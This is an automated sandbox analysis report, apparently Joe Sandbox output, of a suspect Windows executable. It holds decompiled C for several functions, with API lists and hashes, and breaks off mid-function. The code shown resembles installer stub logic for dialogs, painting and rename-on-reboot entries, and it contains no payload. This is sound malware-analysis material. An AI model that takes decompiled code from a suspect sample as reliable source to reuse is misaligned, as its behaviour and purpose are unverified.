ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
DeleteObject.GDI32(00000000), ref: 00404FCA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
GetWindowLongW.USER32(?,000000F0), ref: 0040510E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
ShowWindow.USER32(?,00000005), ref: 0040512C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
ImageList_Destroy.COMCTL32(?), ref: 004052FA
GlobalFree.KERNEL32(?), ref: 0040530A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
ShowWindow.USER32(?,00000000), ref: 004054B4
GetDlgItem.USER32(?,000003FE), ref: 004054BF
ShowWindow.USER32(00000000), ref: 004054C6

Strings

N, xrefs: 00405165
M, xrefs: 00405084
, xrefs: 0040549E

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 35b73b0ddb5c37642a621bb27d0b5ea63b41f9933646945a10f9cae77aa2ee02
Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
Opcode Fuzzy Hash: 35b73b0ddb5c37642a621bb27d0b5ea63b41f9933646945a10f9cae77aa2ee02
Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216d4 =  *0x4216d4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044CA(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281c0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E004048D1(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a228, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a228, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226e0; // 0x56b904
						_t29 = _t69 + 0x14; // 0x56b918
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048AD();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E004045D3;
				if(_t110 != 2) {
					_v8 = E00404599;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404463(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404463(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404498(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a230 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216d4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216d4 = 0;
				return 0;
			}

0x00404634
0x00404761
0x004047be
0x004047c2
0x0040488f
0x00404891
0x00404891
0x00404897
0x00404897
0x0040489a
0x00000000
0x004048a1
0x004047d0
0x004047d6
0x004047e0
0x004047eb
0x004047ee
0x004047f1
0x004047fc
0x004047ff
0x00404806
0x00404813
0x00404824
0x0040482a
0x00404832
0x00404840
0x00404846
0x00404846
0x00404806
0x00404850
0x00000000
0x0040485b
0x0040485f
0x0040486f
0x0040486f
0x00404875
0x00404881
0x00404881
0x00000000
0x00404885
0x00404850
0x0040476c
0x00000000
0x0040477e
0x0040477e
0x00404783
0x00404783
0x00404789
0x00000000
0x00000000
0x004047b2
0x004047b4
0x004047b9
0x00000000
0x004047b9
0x0040476c
0x0040463a
0x0040463d
0x00404642
0x00404653
0x00404653
0x0040465b
0x0040465e
0x00404662
0x00404665
0x00404669
0x0040466c
0x0040466f
0x00404672
0x00404679
0x0040467b
0x0040467b
0x00404685
0x00404692
0x0040469c
0x004046a1
0x004046a4
0x004046a9
0x004046c0
0x004046c7
0x004046da
0x004046dd
0x004046f1
0x004046f8
0x004046fd
0x00404702
0x00404702
0x00404710
0x0040471e
0x00404730
0x00404735
0x00404745
0x00404747
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
GetDlgItem.USER32(?,000003E8), ref: 004046D4
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
GetSysColor.USER32(?), ref: 00404702
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
lstrlenW.KERNEL32(?), ref: 00404723
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
GetDlgItem.USER32(?,0000040A), ref: 0040479E
SendMessageW.USER32(00000000), ref: 004047A5
GetDlgItem.USER32(?,000003E8), ref: 004047D0
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
LoadCursorW.USER32(00000000,00007F02), ref: 00404821
SetCursor.USER32(00000000), ref: 00404824
LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
SetCursor.USER32(00000000), ref: 00404840
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881

Strings

Call, xrefs: 004047FF
N, xrefs: 004047BE

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a230;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040614D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426da8 = 0x55004e;
				 *0x426dac = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
						_t53 = _t52 + 0x10;
						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060A9(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405FF7(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x0040614d
0x00406156
0x0040615d
0x00406167
0x0040617b
0x004061a3
0x004061ae
0x004061b2
0x004061d2
0x004061d9
0x004061e3
0x004061f0
0x004061f5
0x004061fa
0x004061fe
0x0040620d
0x0040620f
0x0040621c
0x00406220
0x004062bb
0x00000000
0x00406236
0x00406243
0x00406267
0x0040626b
0x0040628a
0x0040628e
0x0040628e
0x00406290
0x00406299
0x004062a4
0x004062af
0x004062b5
0x00000000
0x004062b5
0x0040626d
0x00406270
0x0040627b
0x00406277
0x00406279
0x0040627a
0x0040627a
0x00406282
0x00406284
0x00000000
0x00406284
0x0040624e
0x00406254
0x00000000
0x00406254
0x00406220
0x004061fe
0x0040617d
0x00406188
0x00406191
0x00406195
0x00000000
0x00000000
0x00406195
0x004062c6

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191

Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
wsprintfA.USER32 ref: 004061CC
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
GlobalFree.KERNEL32(00000000), ref: 004062B5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Strings

%ls=%ls, xrefs: 004061C2
[Rename], xrefs: 00406236, 00406248

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 48f58ee6c1568dd199c04865158994eb8a9ff379ffc5c95430a82ce8fda2b485
Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
Opcode Fuzzy Hash: 48f58ee6c1568dd199c04865158994eb8a9ff379ffc5c95430a82ce8fda2b485
Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD

Uniqueness

Uniqueness Score: -1.00%

Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004044dc
0x00404592
0x00000000
0x00404592
0x004044ed
0x004044f1
0x00000000
0x0040450b
0x0040450b
0x00404514
0x00000000
0x00000000
0x00404516
0x00404522
0x00404525
0x00404525
0x0040452b
0x00404531
0x00404531
0x0040453d
0x00404543
0x0040454a
0x0040454d
0x00404550
0x00404552
0x00404552
0x0040455a
0x00404560
0x00404560
0x0040456a
0x0040456f
0x00404572
0x00404577
0x0040457a
0x0040457a
0x0040458a
0x0040458a
0x00000000
0x0040458d

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044E7
GetSysColor.USER32(00000000), ref: 00404525
SetTextColor.GDI32(?,00000000), ref: 00404531
SetBkMode.GDI32(?,?), ref: 0040453D
GetSysColor.USER32(?), ref: 00404550
SetBkColor.GDI32(?,?), ref: 00404560
DeleteObject.GDI32(?), ref: 0040457A
CreateBrushIndirect.GDI32(?), ref: 00404584

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
